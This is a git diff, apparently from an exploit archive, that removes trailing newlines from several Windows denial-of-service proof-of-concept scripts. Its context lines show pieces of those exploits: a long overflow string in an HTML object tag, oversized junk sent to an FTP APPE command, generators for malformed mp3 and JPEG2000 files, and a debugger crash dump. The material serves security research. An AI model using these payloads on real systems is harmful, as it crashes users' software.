xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"> -</object> +</object> \ No newline at end of file diff --git a/platforms/windows/dos/15750.py b/platforms/windows/dos/15750.py index 99e6f52f7..900d63df9 100755 --- a/platforms/windows/dos/15750.py +++ b/platforms/windows/dos/15750.py @@ -65,4 +65,4 @@ s.send('PASS '+sys.argv[3]+'\r\n') s.recv(1024) s.send('APPE '+junk+'\r\n') s.recv(1024) -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/15786.py b/platforms/windows/dos/15786.py index ec83baf44..c179be3c9 100755 --- a/platforms/windows/dos/15786.py +++ b/platforms/windows/dos/15786.py @@ -23,5 +23,4 @@ try: print "Vulnerable files created!..." print "Insert mp3 files into the application and select join\n" except: - print "Error occured!" - + print "Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15787.py b/platforms/windows/dos/15787.py index e290c84e0..41adaa6bf 100755 --- a/platforms/windows/dos/15787.py +++ b/platforms/windows/dos/15787.py @@ -20,5 +20,4 @@ try: print " Vulnerable file created!..." print " Insert mp3 file into the application and select convert\n" except: - print "[-] Error occured!" - + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15788.py b/platforms/windows/dos/15788.py index c7472064e..84a41fbd1 100755 --- a/platforms/windows/dos/15788.py +++ b/platforms/windows/dos/15788.py @@ -20,5 +20,4 @@ try: print " Vulnerable file created!..." print " Insert mp3 file into the application and select cut\n" except: - print "[-] Error occured!" - + print "[-] Error occured!" \ No newline at end of file diff --git a/platforms/windows/dos/15803.py b/platforms/windows/dos/15803.py index 2eddea823..75d146af1 100755 --- a/platforms/windows/dos/15803.py +++ b/platforms/windows/dos/15803.py @@ -415,4 +415,4 @@ eax=00000000 ebx=0050299c ecx=00000011 edx=0000003b esi=00000000 edi=00000000 eip=7798c64e esp=00abf8a4 ebp=00abf974 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 ntdll!RtlTimeFieldsToTime+0x1d7: -7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? +7798c64e 8b4714 mov eax,dword ptr [edi+14h] ds:0023:00000014=???????? \ No newline at end of file diff --git a/platforms/windows/dos/15821.py b/platforms/windows/dos/15821.py index dc9893f85..026923fc2 100755 --- a/platforms/windows/dos/15821.py +++ b/platforms/windows/dos/15821.py @@ -52,4 +52,4 @@ except: sys.exit(0) s.send(junk+'\r\n') -s.close() +s.close() \ No newline at end of file diff --git a/platforms/windows/dos/15845.py b/platforms/windows/dos/15845.py index aad74bbf3..ecdfc83bb 100755 --- a/platforms/windows/dos/15845.py +++ b/platforms/windows/dos/15845.py @@ -21,5 +21,4 @@ f = open(filepath, "wb") f.write('\x00\x00\x00\x0C\x6A\x50\x20\x20\x0D\x0A\x87\x0A\x00\x00\x00\x14\x66\x74\x79\x70\x6A\x70\x32\x20\x00\x00\x00\x00\x6A\x70\x32\x20\x00\x00\x00\x2D\x6A\x70\x32\x68\x00\x00\x00\x16\x69\x68\x64\x72\x00\x00\x00\x0D\x00\x00\x00\x0B\x00\x03\x07\x07\x00\x00\x00\x00\x00\x0F\x63\x6F\x6C\x72\x01\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x6A\x70\x32\x63\xFF\x4F\xFF\x51\x00\x2F\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0B\x00\x00\x00\x0D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x07\x01\x01\x07\x01\x01\x00\x00\x00\x00\x5C\x00\x0D\x40\x40\x48\x48\x50\x48\x48\x50\x48\x48\x50\xFF\x52\x00\x0C\x00\x00\x00\x01\x01\x03\x04\x04\x00\x01\xFF\x64\x00\x0F\x00\x01\x4C\x57\x46\x5F\x4A\x50\x32\x5F\x32\x30\x37\xFF\x90\x00\x0A\x00\x00\x00\x00\x01\xD7\x00\x01\xFF\x93\xC7\xD4\x0A\x0B\xC7\x38\x51\x7F\xC3\xE7\x06\x05\x37\xD2\xC7\xD4\x0A\x03\x99\xA5\x4C\x37\xC1\xF3\x83\x8F\xB4\x16\x0F\xA8\x0C\x02\x3E\x7F\x0C\x36\xBB\x62\x2F\x0B\xCC\x17\xC0\x7C\x21\x40\x7C\x21\xC0\x7C\x80\x80\x04\x3F\x00\x8C\x5F\x08\x4B\xC1\xF3\x83\x87\xD4\x0B\x03\xE7\x06\x03\x86\x7F\x0C\x3F\x54\xA0\x7F\x08\xC3\x3F\xC7\xDA\x19\x0F\xA8\x26\x1F\x68\x50\x1D\x1C\x3D\xBB\xD4\xFC\x81\x39\x8F\xA6\x70\x69\x0D\x31\x7D\x53\xE7\xDB\x76\x1B\xBF\x0C\xAC\x1B\x93\x78\xD2\xF9\xD4\xA4\x4F\xC1\xF3\x8A\x81\xF2\x07\x80\xF9\x03\x80\x1C\x55\x34\xA2\x49\xD7\xFB\x27\x22\x0F\x01\xA7\xB1\x0A\x1F\x87\x4F\x04\x72\xC3\xEE\xE0\x5C\x7F\xC1\xF3\x8C\x87\xD4\x13\x07\xD4\x10\x11\x7B\xFC\x98\xB8\x1F\x71\x08\x68\xBE\x09\x3F\x0B\x4F\x2B\x89\x58\x56\x5E\xD9\xF3\x0C\xAC\x7A\x0E\x4B\x8C\xDA\x19\xC3\xEA\x1D\x87\xD4\x3D\x07\xD4\x30\x4F\x4D\xF3\xDD\x3B\x9E\x30\xC2\x67\xC8\xBE\x80\x42\x86\xA2\x9D\x6E\x6C\x29\x29\x2B\xDD\xF5\x71\x5E\xD4\x7D\xE4\x5F\x03\x8A\xAE\x0D\x74\xDA\xBA\xD1\x3F\xD2\x58\x2F\x8D\x45\x36\x7B\xF4\x45\xC1\x95\x14\xDB\x5D\x6E\x1C\x49\xC8\xC2\x72\xDF\x1E\xE9\x2F\x2C\xBC\xC7\xAA\x56\x9E\xA9\x73\xFD\xA7\xEB\xEB\x43\x78\x20\x08\x39\xEE\x07\xCE\x2B\xC1\xF3\x99\x83\xE7\x33\x03\xE7\x2E\x5F\xEC\x62\x95\x14\x7C\xE1\xB1\x36\x06\xEE\x8D\x1B\xB8\xD9\xFC\x4C\x12\x2D\x5F\xA2\xA1\x7C\x80\xFD\x3D\x57\x59\xB9\x1B\xCD\x48\x78\xB4\xC6\x7F\xC3\x73\x32\x8F\x6E\x38\x51\x45\xCD\xC7\xDA\xED\x54\x5B\x09\xC2\xC1\x85\xF6\x0B\x9C\xEF\x38\x79\x10\x72\x31\x80\x43\x0D\x75\x99\x95\x9C\xE6\x44\x7F\xC1\xF3\x9E\x87\xD4\x3D\x03\xE7\x2E\x11\x88\x13\x57\x4E\x51\x31\x2D\xBF\x76\xEC\x3E\x42\x3C\xF9\xA6\x5D\x7D\x96\x05\xF0\xA9\xA0\x9E\x69\x4C\xBF\x71\xA3\xBF\x03\x89\x78\x67\x57\xF0\xBB\xD2\x32\x12\x88\x9C\xD3\x41\xF6\x81\xED\x3E\x2E\x35\x62\xF1\x69\xDA\xC2\x71\x0F\xAB\x14\x1B\x16\x55\xAC\x51\x83\x1E\x48\x2E\x20\xC8\x39\x1A\x46\x12\xE1\x62\x07\x88\x8C\x43\x20\x1A\x1B\xFF\xD9') f.close() -print "Done, 2 files generated on 'C:\\' ..." - +print "Done, 2 files generated on 'C:\\' ..." \ No newline at end of file diff --git a/platforms/windows/dos/15851.py b/platforms/windows/dos/15851.py index 3b304b7c7..b73ef42ac 100755 --- a/platforms/windows/dos/15851.py +++ b/platforms/windows/dos/15851.py @@ -13,5 +13,4 @@ f = open(filepath, "wb") 